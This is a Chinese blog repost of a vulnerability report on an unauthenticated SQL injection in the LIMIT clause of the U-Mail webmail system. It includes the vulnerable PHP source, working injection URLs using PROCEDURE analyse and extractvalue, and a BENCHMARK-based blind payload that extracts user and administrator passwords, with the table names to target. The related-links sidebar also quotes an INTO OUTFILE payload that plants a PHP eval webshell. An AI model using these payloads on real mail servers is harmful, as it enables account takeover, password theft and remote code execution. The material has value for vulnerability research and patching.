mysql注入提取邮件_U-Mail邮件系统注入2(SQL Injections in MySQL LIMIT clause,无需登录,附获取用户密码脚本)...

最新推荐文章于 2023-06-12 15:07:45 发布
最新推荐文章于 2023-06-12 15:07:45 发布
阅读量823 收藏
点赞数
文章标签: mysql注入提取邮件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35414484/article/details/114349806
版权
文章详细介绍了如何利用MySQL中的LIMIT子句进行SQL注入,特别是针对U-Mail邮件系统的漏洞,展示了无需登录即可通过注入获取用户密码的方法,包括利用BENCHMARK函数进行盲注的过程和示例脚本。
摘要由CSDN通过智能技术生成

### 简要描述:

SQL Injections in MySQL LIMIT clause,过滤不严,产生盲注,导致可以注射用户名与密码,无需登录

### 详细说明:

上次搜索只在client搜索,今天无意在fast目录下搜索了下,又发现了一处。

注:client的目录下的所有函数必须登录才可以执行,fast的目录无需登录可以执行部分存在的函数,但并不能查看邮件等等。

漏洞与上一个原理一样,但文件不同,此处访问权限设置不严格,可以任意用户访问,导致可以无需登录即可sql注入,limit无法使用sleep,用benchamark延时

漏洞文件/fast/oab/module/operates.php代码

```

if ( ACTION == "member-get" )

{

$dept_id = gss( $_GET['dept_id'] );

$keyword = gss( $_GET['keyword'] );

$page = $_GET['page'] ? gss( $_GET['page'] ) : 1;

//limit

$limit = $_GET['limit'] ? gss( $_GET['limit'] ) : 25;//用户可控的变量

$orderby = gss( $_GET['orderby'] );

$is_reverse = gss( $_GET['is_reverse'] );

$data_cache = $Department->getDepartmentByDomainID( $domain_id, "dept_id,name,parent_id,`order`", 0 );

$department_list = create_array( $data_cache, "dept_id", "name" );

$where = "";

if ( $dept_id && $dept_id != "-1" )

{

$Tree = $Department->getTreeObject( );

$Tree->set_data_cache( $data_cache );

$Tree->sort_data( -1, 1 );

$dept_ids = $Tree->get_child_id( $dept_id );

$user_ids = $Department->getMailboxIDByDepartmentID( $dept_ids, 0 );

$where = "t1.UserID IN (".$user_ids.")";

}

if ( $keyword )

{

if ( $where )

{

$where .= " AND ";

}

if ( strpos( $keyword, "@" ) )

{

$key_tmp = explode( "@", $keyword );

$keyword = $key_tmp[0];

}

$where .= "(t1.FullName LIKE \"%".$keyword."%\" OR t1.Mailbox LIKE \"%".$keyword."%\")";

}

switch ( $orderby )

{

case "fullname" :

$orderby = "t1.FullName";

break;

case "mailbox" :

$orderby = "t1.Mailbox";

break;

case "sex" :

$orderby = "t2.sex";

break;

case "birthday" :

$orderby = "t2.birthday";

break;

case "mobile" :

$orderby = "t2.mobil";

break;

case "tel" :

$orderby = "t2.teleextension";

break;

case "position" :

$orderby = "t2.headship";

break;

case "group_num" :

$orderby = "t2.o_group";

break;

case "email" :

$orderby = "t1.Mailbox";

break;

$orderby = "";

}

$arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, $page, $limit, $orderby, $is_reverse, 0 );//进入了函数

```

$limit可控,因而产生了注入,注入利用过程

首先向url post数据,(注,其实该接口并非是任意登录,执行后仅可以执行仅有的几个函数,所以如果执行了有sql缺陷的函数,则产生相应了相应的无需登录的sql注入问题,如可以update密保问题则产生了获得任意用户密码的缺陷,但可访问的函数有限,并不能查看用户邮件等等)

[a.png](https://images.seebug.org/upload/201501/29230038f21fc95c78226b5d832527e7a11c828b.png)

获得认证后,执行如下

http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=member-get&limit=1,1+PROCEDURE+analyse(extractvalue(rand(),concat(0x3a,version())),1)

发现结果如下

[b.png](https://images.seebug.org/upload/201501/29230238fe9c08289774682e15a67af9e911e29f.png)

其执行的sql语句为

```

150128 21:44:43 3142 Connectumail@localhost on

3142 QuerySET NAMES 'UTF8'

3142 Init DBumail

3142 QuerySELECT dept_id,name,parent_id,`order` FROM oab_department WHERE domain_id='1' ORDER BY `order`,`dept_id`

3142 QuerySELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*

FROM userlist as t1, mailuserinfo as t2

WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0

ORDER BY t1.OrderNo DESC,t1.Mailbox ASC

3142 QuerySELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*

FROM userlist as t1, mailuserinfo as t2

WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0

ORDER BY t1.OrderNo DESC,t1.Mailbox ASC LIMIT 1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,version())),1)

3142 Quit

```

[c.png](https://images.seebug.org/upload/201501/29230313e8d13136347ed2ce45ef3cc7fe234411.png)

由于未执行错误回显,因而我们实施盲注,代码为

http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=member-get&limit=1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(if(ascii(substr((select password from userlist where userid=2),1,1))=97, BENCHMARK(50000000,SHA1(1)),1)))),1)

[d.png](https://images.seebug.org/upload/201501/292303527b109f03009696941b88e194e665eddd.png)

其sql代码为

```

150128 21:47:16 3144 Connectumail@localhost on

3144 QuerySET NAMES 'UTF8'

3144 Init DBumail

3144 QuerySELECT dept_id,name,parent_id,`order` FROM oab_department WHERE domain_id='1' ORDER BY `order`,`dept_id`

3144 QuerySELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*

FROM userlist as t1, mailuserinfo as t2

WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0

ORDER BY t1.OrderNo DESC,t1.Mailbox ASC

3144 QuerySELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*

FROM userlist as t1, mailuserinfo as t2

WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0

ORDER BY t1.OrderNo DESC,t1.Mailbox ASC LIMIT 1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(if(ascii(substr((select password from userlist where userid=2),1,1))=97, BENCHMARK(50000000,SHA1(1)),1)))),1)

```

成功注入

因而可以通过脚本跑不同的用户帐号和密码,管理员的

#select+password+from+userlist+where+userid=2 system用户

#select+password+from+web_usr+where+usr_code=1 administrator用户

#select+password+from+web_usr+where+usr_code=2 admin用户

普通用户的话遍历userid获取username password即可。

附盲注脚本(脚本写的一半,未用二分法等,将就用)

本地测试

[j.jpg](https://images.seebug.org/upload/201501/29230727a14da43a2b26191fe2f8e922b37e19d6.jpg)

以及官网管理登录截图

[e.png](https://images.seebug.org/upload/201501/292306185e3895e8f00d96837327be0189a39a2e.png)

[f.png](https://images.seebug.org/upload/201501/29230625aa82c0dbe2cf6da5f51296caadc7a140.png)

### 漏洞证明:

如上

loading-bars.svg

元楼
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql limit 注入_U-Mail邮件系统注入2(SQL Injections in MySQL LIMIT clause,无需登录获取用户密码脚本)...
weixin_39611070的博客
02-07 417
上次搜索只在client搜索,今天无意在fast目录下搜索了下,又发现了一处。注:client的目录下的所有函数必须登录才可以执行,fast的目录无需登录可以执行部分存在的函数,但并不能查看邮件等等。漏洞与上一个原理一样,但文件不同,此处访问权限设置不严格,可以任意用户访问,导致可以无需登录即可sql注入limit无法使用sleep,用benchamark延时漏洞文件/fast/oab/modu...
U-Mail邮件系统客户无需担心OpenSSL心脏出血漏洞
U-Mail邮件服务器软件
04-23 908
2014年4月7日OpenSSL发布了安全公告,在OpenSSL1.0.1版本中存在严重漏洞(CVE-2014-0160)。该漏洞导致攻击者可以远程读取存在漏洞版本的OpenSSL服务器内存中多达64K的数据。 很多客户打电话来咨询U-Mail邮件系统的技术支持。 问:“U-Mail邮件系统是否也存在该漏洞?” U-Mail邮件系统的技术支持:“U-Mail邮件系统目前使用的OpenSS
大部分政府网站U-mail存在直接拿shell漏洞
weixin_34355559的博客
10-01 458
大部分网站政府网站U-mail存在直接拿shell漏洞加入webmail/userapply.php?execadd=333&DomainID=111直接爆出物理地址 然后将 aa' union select 1,2,3,4,5,6,'<?php eval($_POST1);?>',8,9,10,11,12,13,14 into outfile 'D:/umail/Wor...
U-Mail邮件服务系统任意文件上传+执行漏洞(runtime缺陷与验证绕过)
weixin_33842304的博客
11-02 855
http://www.wooyun.org/bugs/wooyun-2010-061859 转载于:https://www.cnblogs.com/hookjoy/p/4068326.html
《目前国内一些免费email存在的一个安全漏洞》
蝈蝈俊.net
08-27 2281
      该Script源于上个世纪(1999年)一次在设置免费email的自动转发时看到一长串的Url时的想法...    看完这篇文章或许你应该赶紧去检查一下你email中的自动转发中有没有别人的email地址:=(最好不要随便打开别人发给你的HTML文件...  我们知道,国内好些免费email用户登录后的认证都是靠一长串的Url(如我用ShellTools登录后是"http://w
so-sql-injections:Stack Overflow PHP问题中SQL注入漏洞
02-04
so-sql注入 Stack Overflow PHP问题中SQL注入漏洞 执照:麻省理工学院
6-SQL-injection.tar.gz_Security Measures_sql injection_sql injec
09-23
This document contains the source code for SQL injection. That is it contains different injections onto database or different sites databases and the security measures to avoid these injections is ...
ronin-sql:用于编写SQL注入的Ruby DSL
02-06
ronin-sql| | 描述{Ronin :: SQL}是用于编写的Ruby DSL。产品特点提供用于编码/解码SQL数据的便捷方法。 提供特定于域的语言(DSL),用于编写普通SQL和。例子便利方法转义字符串: "O'Brian".sql_escape# => "'O''...
Nginx中防止SQL注入攻击的相关配置介绍
09-30
在Nginx中防止SQL注入攻击是保护Web应用程序安全的重要环节。SQL注入是黑客利用恶意SQL语句侵入数据库的一种常见方法。以下是一些相关的配置介绍,这些配置可以帮助你阻止可能的SQL注入尝试。 首先,了解基本思路:...
injections-web:Web应用程序中的代码注入
04-29
这种攻击方式主要包括两种主要形式:XSS(跨站脚本)和SQL注入SQL Injection)。让我们深入探讨这两种注入攻击及其防御策略。 **XSS(跨站脚本)攻击** XSS攻击是当Web应用未能正确地过滤或转义用户提供的数据,...
邮件服务器元传出重大漏洞 目前已出现攻击程序
weixin_34106122的博客
06-14 351
近60%的服务器邮件服务器组件Exim已经通过了一个主要漏洞,允许黑客以最高权限执行任意命令。经过一周的发现,研究人员发现至少有两个群体发动了攻击,包括Linux Servo。用户特别关注他们的目标。 Exim是一种开源邮件传输代理(Mail Tansfer Agent,MTA),广泛用于全球邮件服务器。据统计,目前全球约占57%,超过50万台邮件服务器使用Exim,有些甚至估计有370万台。在...
U-Mail邮件系统多重措施保障用户信息安全 防范邮件泄密
最新发布
U-Mail邮件服务器软件
06-12 914
U-Mail邮件系统提供基于AES加密的邮件加密技术,对邮件数据进行先加密后传输,避免在传输过程中被监听或截取,采用国际标准的SMTP/SSL、POP3/SSL、S/MIME安全邮件协议,在邮件认证、邮件发送(SMTP)和邮件接收(POP3)所有环节上都高位加密,防止网络侦听,同时采用ECC加密算法对存储在磁盘上的邮件文件进行加密,全方位杜绝邮件在收发及存储等环节引发的邮件数据泄露。据调查,被泄露的文件包括网络安全、通信和边境监测数据,以及关于情报和卫星监测系统的敏感信息等。
U-mail邮件系统又一getshell
weixin_34004576的博客
01-06 897
漏洞作者:路人甲U-mail邮件系统某处处理不当,导致getshell详细说明:版本:U-Mail for Windows V9.8.57测试帐号:hello0001@fuck.com测试主机:windows server 2003+IIS6 [windows主机配置都为邮件系统默认配置]首先需要获取用户的UserID,因为其缓存目录路径为 umail\WorldClien...
文件上传漏洞
newlife1441的博客
08-14 1571
trim()作用:从一个字符串的两端删除空白字符deldot()作用:从字符串的尾部开始,从后向前删除点.,直到该字符串的末尾字符不是.为止strrchr()作用:查找字符串在另一个字符串中最后一次出现strtolower()作用:转换大小写str_ireplace()作用:字符串替换操作,不区分大小写。......
邮件注册(一)
qxs101307204的专栏
10-21 429
1 关闭PHP版本信息在http头中的泄漏     我们为了防止黑客获取服务器中php版本的信息,可以关闭该信息斜路在http头中:     expose_php = Off     比如黑客在 telnet www.12345.com 80 的时候,那么将无法看到PHP的信息。     2 关闭注册全局变量     在PHP中提交的变量,包括使用POST或者GET提交的变量,
从外网至内网渗透过程
weixin_30507481的博客
06-09 2450
【实验环境】仅供学习参考 信息收集 登陆目标网站并收集信息 通过查看页面源码,发现cms版本信息为:DotNetCMS 2.0,通过上网查询可以找到该cms存在的漏洞,并进行复现 登录绕过漏洞 网站后台地址:/manage/Index.aspx 1)将代码写入exp.py文件中运行,即可得到cookie 代码如下: #coding:utf-8import argp...
实战挖掘某出版社漏洞集合
XunanSec的博客
05-27 723
0x00 前言 之前挖漏洞时,碰到的一个出版社漏洞,也是挺有名的,看码猜社哈哈。 0x01 主站XSS 主页搜索框,发现是get传参 http://www.*****.com/so.htm?&KEY=1%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E 个人中心XSS可打Cookie 基本资料,昵称处限制了长度,直接插入payload <sCRiPt sRC=http://xss.pt/xxxx>&l
Coremail邮件系统存在配置信息泄露漏洞(CNVD-2019-16798)
墨痕诉清风的博客
11-09 7714
目前,论客公司已发布补丁进行修复,针对Coremail XT5和Coremail XT3/CM5版本,补丁编号为CMXT5-2019-0002,程序版本1.1.0-alphabuild20190524(3813d273)。综合CNVD技术支撑单位报送、白帽子报送、CNVD秘书处主动探测的结果显示,我国境内共有1484台服务器受此漏洞影响,影响比例约为4.0%。邮件系统mailsms模块的参数大小写敏感存在缺陷,使得攻击者利用该漏洞,在未授权的情况下,通过远程访问URL地址获知。...
验证p码绕过、密码找回漏洞。。
qq_45300786的博客
08-31 387
所有的验证码都会在数据包里传输。 靶场地址(验证码可以重复) 用一个验证码可以重复使用,就算出现了下一个验证码,也可以使用上一个验证码。 http://59.63.200.79:8010/csrf/uploads/dede 七 11 登录5后就必须用验证码登录了(换seseion密码找回漏洞 前段返回验证码。 编码问题 直接访问重置密码地址。直接重置。 越权漏洞。把自己的ID替换成别人的,然后来接受验证码,然后就可以修改密码了 进靶场之前,先看下源码的验证码的范围。 ..
ctx.injections.tableRoot.$scopedSlots[ctx.props.column.slot] is not a function
03-08
这个问题可能是关于编程的,我可以回答。这个错误通常是因为在使用 Vue.js 的 scoped slot 时,没有正确地定义 slot 的名称或者没有正确地传递参数导致的。您可以检查一下代码中是否有这些问题,并进行相应的修复。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值